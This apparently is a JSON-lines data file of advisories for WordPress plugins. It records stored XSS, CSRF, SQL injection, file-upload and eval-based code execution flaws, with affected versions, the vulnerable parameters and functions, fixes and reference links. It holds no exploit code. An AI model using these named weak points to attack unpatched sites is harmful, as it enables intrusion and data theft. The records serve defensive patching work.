{"CVE_ID":"CVE-2024-13573","slug":"zigaform-form-builder-lite","versionImpact":"7.4.7","versionEndExcluding":"7.4.8","description":"The Zigaform \u2013 Form Builder Lite plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'zgfm_rfvar' shortcode in all versions up to, and including, 7.4.2 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 7.4.8, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/zigaform-form-builder-lite\\\/trunk\\\/modules\\\/formbuilder\\\/controllers\\\/uiform-fb-controller-frontend.php#L366\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/zigaform-form-builder-lite\\\/trunk\\\/modules\\\/formbuilder\\\/controllers\\\/uiform-fb-controller-frontend.php#L366\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/768d0ef5-5213-4283-b95e-ddfe0d2196bf?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/768d0ef5-5213-4283-b95e-ddfe0d2196bf?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-7369","slug":"shortcodes-ultimate","versionImpact":"7.4.2","versionEndExcluding":"7.4.3","description":"The WP Shortcodes Plugin \u2014 Shortcodes Ultimate plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 7.4.2. This is due to missing or incorrect nonce validation on the preview function. This makes it possible for unauthenticated attackers to execute arbitrary shortcodes via a forged request, granted they can trick a site administrator into performing an action such as clicking on a link.\r\nIn combination with CVE-2025-7354, it leads to Reflected Cross-Site Scripting.","recommendation":"Update to version 7.4.3, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/shortcodes-ultimate\\\/tags\\\/7.4.2\\\/inc\\\/core\\\/generator.php#L339\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/shortcodes-ultimate\\\/tags\\\/7.4.2\\\/inc\\\/core\\\/generator.php#L339\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3328729\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3328729\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/5934d1c8-1553-4908-aaab-89d2189eb4cd?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/5934d1c8-1553-4908-aaab-89d2189eb4cd?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-7354","slug":"shortcodes-ultimate","versionImpact":"7.4.2","versionEndExcluding":"7.4.3","description":"The WP Shortcodes Plugin \u2014 Shortcodes Ultimate plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's shortcodes in all versions up to, and including, 7.4.2 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 7.4.3, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/shortcodes-ultimate\\\/tags\\\/7.4.2\\\/includes\\\/shortcodes\\\/button.php#L408\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/shortcodes-ultimate\\\/tags\\\/7.4.2\\\/includes\\\/shortcodes\\\/button.php#L408\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/shortcodes-ultimate\\\/tags\\\/7.4.2\\\/includes\\\/shortcodes\\\/expand.php#L130\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/shortcodes-ultimate\\\/tags\\\/7.4.2\\\/includes\\\/shortcodes\\\/expand.php#L130\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/shortcodes-ultimate\\\/tags\\\/7.4.2\\\/includes\\\/shortcodes\\\/members.php#L79\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/shortcodes-ultimate\\\/tags\\\/7.4.2\\\/includes\\\/shortcodes\\\/members.php#L79\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/shortcodes-ultimate\\\/tags\\\/7.4.2\\\/includes\\\/shortcodes\\\/post.php#L116\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/shortcodes-ultimate\\\/tags\\\/7.4.2\\\/includes\\\/shortcodes\\\/post.php#L116\",\"refsource\":\"\",\"tags\":[]
},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/shortcodes-ultimate\\\/tags\\\/7.4.2\\\/includes\\\/shortcodes\\\/user.php#L95\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/shortcodes-ultimate\\\/tags\\\/7.4.2\\\/includes\\\/shortcodes\\\/user.php#L95\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3328729\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3328729\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/62d32cda-bb6d-4ffa-82b9-f2f6e8d4346f?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/62d32cda-bb6d-4ffa-82b9-f2f6e8d4346f?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-8015","slug":"shortcodes-ultimate","versionImpact":"7.4.2","versionEndExcluding":"7.4.3","description":"The WP Shortcodes Plugin \u2014 Shortcodes Ultimate plugin for WordPress is vulnerable to Stored Cross-Site Scripting via an uploaded image's 'Title' and 'Slide link' fields in all versions up to, and including, 7.4.2 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Author-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 7.4.3, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3328729\\\/shortcodes-ultimate\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3328729\\\/shortcodes-ultimate\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/deba0a29-7fe5-4f94-bee6-9d01e023215e?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/deba0a29-7fe5-4f94-bee6-9d01e023215e?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-3549","slug":"blog2social","versionImpact":"7.4.1","versionEndExcluding":"7.4.2","description":"The Blog2Social: Social Media Auto Post & Scheduler plugin for WordPress is vulnerable to SQL Injection via the 'b2sSortPostType' parameter in all versions up to, and including, 7.4.1 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query.  This makes it possible for authenticated attackers, with subscriber-level access and above, to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.","recommendation":"Update to version 7.4.2, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/3b472eb8-9808-4a50-b2b4-0b0b3256053f?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/3b472eb8-9808-4a50-b2b4-0b0b3256053f?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3069574\\\/blog2social\\\/trunk\\\/includes\\\/B2S\\\/Post\\\/Item.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3069574\\\/blog2social\\\/trunk\\\/includes\\\/B2S\\\/Post\\\/Item.php\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-4775","slug":"ajax-load-more","versionImpact":"7.4.0.1","versionEndExcluding":"7.4.1","description":"The WordPress Infinite Scroll \u2013 Ajax Load More plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the data-button-label HTML attribute in all versions up to, and including, 7.4.0.1 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 7.4.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ajax-load-more\\\/tags\\\/7.3.1.2\\\/build\\\/frontend\\\/ajax-load-more.min.js\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ajax-load-more\\\/tags\\\/7.3.1.2\\\/build\\\/frontend\\\/ajax-load-more.min.js\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/614bdce2-bd87-4516-b1a5-028ffc08b238?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/614bdce2-bd87-4516-b1a5-028ffc08b238?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-5567","slug":"shortcodes-ultimate","versionImpact":"7.4.0","versionEndExcluding":"7.4.1","description":"The WP Shortcodes Plugin \u2014 Shortcodes Ultimate plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'data-url' DOM element attribute in all versions up to, and including, 7.4.0 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 7.4.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/shortcodes-ultimate\\\/tags\\\/7.4.0\\\/includes\\\/js\\\/shortcodes\\\/index.js\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/shortcodes-ultimate\\\/tags\\\/7.4.0\\\/includes\\\/js\\\/shortcodes\\\/index.js\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/fbd67145-5b95-4890-a265-1dd7a029aec6?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/fbd67145-5b95-4890-a265-1dd7a029aec6?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-12330","slug":"wp-database-backup","versionImpact":"7.3","versionEndExcluding":"7.4","description":"The WP Database Backup \u2013 Unlimited Database & Files Backup by Backup for WP plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 7.3 via publicly accessible back-up files. This makes it possible for unauthenticated attackers to extract sensitive data including all information stored in the database.","recommendation":"Update to version 7.4, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3209380%40wp-database-backup&new=3209380%40wp-database-backup&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3209380%40wp-database-backup&new=3209380%40wp-database-backup&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3209387%40wp-database-backup&new=3209387%40wp-database-backup&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3209387%40wp-database-backup&new=3209387%40wp-database-backup&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/3f36839b-850e-4c39-aa61-4fd7a89cd5bc?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/3f36839b-850e-4c39-aa61-4fd7a89cd5bc?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-12300","slug":"ar-for-wordpress","versionImpact":"7.3","versionEndExcluding":"7.4","description":"The AR for WordPress plugin for WordPress is vulnerable to unauthorized double extension file upload due to a missing capability check on the set_ar_featured_image() function in all versions up to, and including, 7.3. This makes it possible for unauthenticated attackers to upload php files leveraging a double extension attack. It's important to note the file is deleted immediately and double extension attacks only work on select servers making this unlikely to be successfully exploited.","recommendation":"Update to version 7.4, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ar-for-wordpress\\\/trunk\\\/includes\\\/ar-add-media.php?rev=3177638\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ar-for-wordpress\\\/trunk\\\/includes\\\/ar-add-media.php?rev=3177638\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3206666%40ar-for-wordpress%2Ftrunk&old=3205240%40ar-for-wordpress%2Ftrunk&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3206666%40ar-for-wordpress%2Ftrunk&old=3205240%40ar-for-wordpress%2Ftrunk&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/8b507369-49f7-4a1d-900b-c7bef40aec96?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/8b507369-49f7-4a1d-900b-c7bef40aec96?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13313","slug":"aweber-web-form-widget","versionImpact":"7.3.20","versionEndExcluding":"7.3.21","description":"The AWeber  WordPress plugin through 7.3.20 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup).","recommendation":"Update to version 7.3.21, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/cc35b2f4-f1f1-4ed3-91b2-025bd5848b29\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/cc35b2f4-f1f1-4ed3-91b2-025bd5848b29\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-7429","slug":"zotpress","versionImpact":"7.3.12","versionEndExcluding":"7.3.13","description":"The Zotpress plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the Zotpress_process_accounts_AJAX function in all versions up to, and including, 7.3.12. This makes it possible for authenticated attackers, with Contributor-level access and above, to reset the plugin's settings.","recommendation":"Update to version 7.3.13, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/1f38676b-270f-4b0f-bc98-a14a26b86a50?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/1f38676b-270f-4b0f-bc98-a14a26b86a50?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/zotpress\\\/trunk\\\/lib\\\/admin\\\/admin.php#L40\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/zotpress\\\/trunk\\\/lib\\\/admin\\\/admin.php#L40\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3153348\\\/zotpress\\\/trunk\\\/lib\\\/admin\\\/admin.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3153348\\\/zotpress\\\/trunk\\\/lib\\\/admin\\\/admin.php\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-10855","slug":"sirv","versionImpact":"7.3.0","versionEndExcluding":"7.3.1","description":"The Image Optimizer, Resizer and CDN \u2013 Sirv plugin for WordPress is vulnerable to unauthorized modification of data that can lead to a denial of service due to insufficient validation on the filename parameter of the sirv_upload_file_by_chunks() function and lack of  in all versions up to, and including, 7.3.0. This makes it possible for authenticated attackers, with Contributor-level access and above, to delete arbitrary option values on the WordPress site. This can be leveraged to delete an option that would create an error on the site and deny service to legitimate users.","recommendation":"Update to version 7.3.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d6ec09e5-4994-4d23-bf8e-26b64d5303fa?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d6ec09e5-4994-4d23-bf8e-26b64d5303fa?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/sirv\\\/tags\\\/7.2.8\\\/sirv.php#L4691\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/sirv\\\/tags\\\/7.2.8\\\/sirv.php#L4691\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3186406%40sirv&new=3186406%40sirv&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3186406%40sirv&new=3186406%40sirv&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-8500","slug":"shortcodes-ultimate","versionImpact":"7.2.2","versionEndExcluding":"7.3.0","description":"The WP Shortcodes Plugin \u2014 Shortcodes Ultimate plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the several parameters in all versions up to, and including, 7.2.2 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 7.3.0, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/78af6e06-4b4c-4f56-a6f8-f98e8f681976?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/78af6e06-4b4c-4f56-a6f8-f98e8f681976?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/shortcodes-ultimate\\\/trunk\\\/includes\\\/js\\\/shortcodes\\\/index.js\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/shortcodes-ultimate\\\/trunk\\\/includes\\\/js\\\/shortcodes\\\/index.js\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3171844\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3171844\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-6290","slug":"wp-seopress","versionImpact":"7.2","versionEndExcluding":"7.3","description":"The SEOPress WordPress plugin before 7.3 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Cross-Site Scripting attacks even when unfiltered_html is disallowed","recommendation":"Update to version 7.3, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/78a13958-cd12-4ea8-b326-1e3184da970b\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/78a13958-cd12-4ea8-b326-1e3184da970b\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-8512","slug":"w3speedster-wp","versionImpact":"7.26","versionEndExcluding":"7.27","description":"The W3SPEEDSTER plugin for WordPress is vulnerable to Remote Code Execution in all versions up to, and including, 7.26 via the 'script' parameter of the hookBeforeStartOptimization() function. This is due to the plugin passing user supplied input to eval(). This makes it possible for authenticated attackers, with Administrator-level access and above, to execute code on the server.","recommendation":"Update to version 7.27, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/2a56eb63-ba5c-4452-8ab9-f5aeaf53adda?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/2a56eb63-ba5c-4452-8ab9-f5aeaf53adda?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/w3speedster-wp\\\/trunk\\\/w3speedster.php#L740\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/w3speedster-wp\\\/trunk\\\/w3speedster.php#L740\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3175640\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3175640\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-6392","slug":"sirv","versionImpact":"7.2.7","versionEndExcluding":"7.2.8","description":"The Image Optimizer, Resizer and CDN \u2013 Sirv plugin for WordPress is vulnerable to unauthorized plugin settings modification due to missing capability checks on the plugin functions in all versions up to, and including, 7.2.7. This makes it possible for authenticated attackers, with Subscriber-level access and above, to change the connected Sirv account to an attacker-controlled one.","recommendation":"Update to version 7.2.8, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/229490c3-d820-4831-b105-a429512c2c60?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/229490c3-d820-4831-b105-a429512c2c60?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/sirv\\\/tags\\\/7.2.6\\\/sirv.php#L5197\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/sirv\\\/tags\\\/7.2.6\\\/sirv.php#L5197\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/sirv\\\/tags\\\/7.2.6\\\/sirv.php#L5338\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/sirv\\\/tags\\\/7.2.6\\\/sirv.php#L5338\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-8480","slug":"sirv","versionImpact":"7.2.7","versionEndExcluding":"7.2.8","description":"The Image Optimizer, Resizer and CDN \u2013 Sirv plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the 'sirv_save_prevented_sizes' function in all versions up to, and including, 7.2.7. This makes it possible for authenticated attackers, with Contributor-level access and above, to exploit the 'sirv_upload_file_by_chunks_callback' function, which lacks proper file type validation, allowing attackers to upload arbitrary files on the affected site's server which may make remote code execution possible.","recommendation":"Update to version 7.2.8, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/1e3e628f-b5e7-40fd-9d34-4a3b23e1e0e7?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/1e3e628f-b5e7-40fd-9d34-4a3b23e1e0e7?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/sirv\\\/trunk\\\/sirv.php?rev=3103410#L4647\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/sirv\\\/trunk\\\/sirv.php?rev=3103410#L4647\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/sirv\\\/tags\\\/7.2.7\\\/sirv.php#L6331\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/sirv\\\/tags\\\/7.2.7\\\/sirv.php#L6331\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3115018\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3115018\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-5853","slug":"sirv","versionImpact":"7.2.6","versionEndExcluding":"7.2.7","description":"The Image Optimizer, Resizer and CDN \u2013 Sirv plugin for WordPress is vulnerable to arbitrary file uploads due to missing file type validation in the sirv_upload_file_by_chanks AJAX action in all versions up to, and including, 7.2.6. This makes it possible for authenticated attackers, with Contributor-level access and above, to upload arbitrary files on the affected site's server which may make remote code execution possible.","recommendation":"Update to version 7.2.7, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/e89b40ec-1952-46e3-a91b-bd38e62f8929?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/e89b40ec-1952-46e3-a91b-bd38e62f8929?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3103410\\\/sirv\\\/trunk\\\/sirv.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3103410\\\/sirv\\\/trunk\\\/sirv.php\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13708","slug":"woocommerce-jetpack","versionImpact":"7.2.4","versionEndExcluding":"7.2.5","description":"The Booster for WooCommerce plugin for WordPress is vulnerable to Stored Cross-Site Scripting via SVG File uploads in versions 4.0.1 to 7.2.4 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that will execute whenever a user accesses the SVG file.","recommendation":"Update to version 7.2.5, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/woocommerce-jetpack\\\/trunk\\\/includes\\\/class-wcj-checkout-files-upload.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/woocommerce-jetpack\\\/trunk\\\/includes\\\/class-wcj-checkout-files-upload.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f58b3971-e1e4-4337-82a3-99c9079c6696?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f58b3971-e1e4-4337-82a3-99c9079c6696?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13744","slug":"woocommerce-jetpack","versionImpact":"7.2.4","versionEndExcluding":"7.2.5","description":"The Booster for WooCommerce plugin for WordPress is vulnerable to arbitrary file uploads due to missing file type validation in the validate_product_input_fields_on_add_to_cart function in versions 4.0.1 to 7.2.4. This makes it possible for unauthenticated attackers to upload arbitrary files on the affected site's server which may make remote code execution possible.","recommendation":"Update to version 7.2.5, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3262569\\\/woocommerce-jetpack\\\/trunk\\\/includes\\\/input-fields\\\/class-wcj-product-input-fields-core.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3262569\\\/woocommerce-jetpack\\\/trunk\\\/includes\\\/input-fields\\\/class-wcj-product-input-fields-core.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f8e1aca8-3d82-4b1a-98c8-29501a377846?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f8e1aca8-3d82-4b1a-98c8-29501a377846?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
